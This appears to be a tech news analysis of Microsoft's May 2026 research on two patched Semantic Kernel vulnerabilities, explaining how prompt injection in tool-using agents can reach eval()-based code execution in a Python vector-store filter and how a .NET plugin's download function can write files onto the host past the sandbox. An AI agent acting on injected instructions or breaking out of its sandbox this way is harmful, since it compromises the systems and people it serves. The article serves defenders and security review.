On May 7, 2026, Microsoft published new security research showing how two already-patched flaws in Semantic Kernel could let prompt injection cross from model misuse into host-level execution. The company said one issue could let attackers reach remote code execution in affected Python agents, while another could let a model write files onto the host through an exposed .NET tool path. The bigger point is broader than one framework: once an AI agent can call tools, unsafe parameter handling becomes an execution problem, not just a content-safety problem.
What Microsoft published on May 7
Microsoft’s security team used Semantic Kernel as a case study for a wider class of agent risks and said it is starting a research series focused on vulnerabilities in popular AI agent frameworks. The May 7 post centered on two previously disclosed but now newly explained issues: CVE-2026-26030 and CVE-2026-25592.
- CVE-2026-26030 affects the Python Semantic Kernel package in versions before 1.39.4 when agents use the In-Memory Vector Store filter path behind the Search Plugin with default behavior.
- CVE-2026-25592 affects Semantic Kernel .NET SDK deployments older than 1.71.0 through the SessionsPythonPlugin path that exposed host-side file movement functions to the model.
- GitHub’s advisory database classifies both issues as critical with a CVSS score of 9.9.
Microsoft’s key argument is that the model is not the security boundary. The risk appears when natural-language input is translated into trusted tool calls, file paths, filters, or code-adjacent parameters that the framework then executes.
Why this is bigger than an old CVE recap
The vulnerabilities themselves were patched earlier in 2026, but Microsoft’s May 7 write-up matters because it demonstrates the full attack chains and frames them as representative of how agent systems fail. In the Python case, Microsoft showed how a prompt-injected value could flow into unsafe filter construction and reach eval()-driven execution in the In-Memory Vector Store path. In the .NET case, the company showed how an AI-accessible download function could break the intended sandbox boundary by writing a malicious file onto the host machine.
That changes the way businesses should read prompt-injection stories. This is no longer mainly about getting a chatbot to say something wrong. It is about getting an agent runtime to do something dangerous with real system privileges, filesystem access, or connected tools.
Microsoft also made the research more operational than a normal disclosure post. The company said affected teams should define the exact vulnerable window for each deployment, hunt for suspicious child processes and outbound activity from agent hosts, and treat suspicious findings as possible host compromise rather than ordinary model misuse.
Business impact for AI agent builders
The practical impact lands on teams building tool-using AI systems, especially in enterprise environments where agents can search internal data, run scripts, move files, or connect to operational platforms. The May 7 research reinforces three points that matter immediately.
Tool parameters must be treated as attacker-controlled
If a model can influence a file path, shell-adjacent argument, vector-store filter, or host bridge function, that parameter belongs in the same threat model as any other untrusted input. A prompt is no longer just text once it becomes executable intent.
Sandboxes can fail at the handoff boundary
The SessionsPythonPlugin example is especially important because it shows that isolation is only as strong as the host-side helpers around it. If an agent can call a bridge function that writes to the host filesystem, the sandbox story can collapse even if the container itself is isolated.
Endpoint telemetry matters as much as AI guardrails
Microsoft’s guidance pushes defenders toward process-level monitoring, suspicious child-process detection, and investigation of what systems the compromised host could reach. That is a sign that agent security is converging with classic runtime and endpoint security, not replacing it.
For enterprises, this also creates a governance issue. Security reviews can no longer stop at the model vendor, system prompt, and content filter. They need to include tool exposure, path validation, host isolation, plugin boundaries, logging, and rollback plans for agents that take action instead of just generating text.
What to watch next
Microsoft said this post is the start of a broader research series covering other agent frameworks beyond the Microsoft ecosystem. That makes this a likely first public case study in a larger 2026 pattern, not an isolated Semantic Kernel story.
That matters because the market is moving toward more tool-connected agents across developer platforms, enterprise automation stacks, and multi-agent systems. As those products compete on autonomy and reach, security differentiation will increasingly come from runtime design: stricter tool exposure, better allowlists, safer parsing, stronger host isolation, and clearer human override points.
For Nerova readers, the takeaway is straightforward. The line between “AI assistant” and “execution layer” is disappearing fast. If your agents can touch files, credentials, internal systems, or business workflows, their framework and runtime design now belong in the same risk conversation as any other production infrastructure.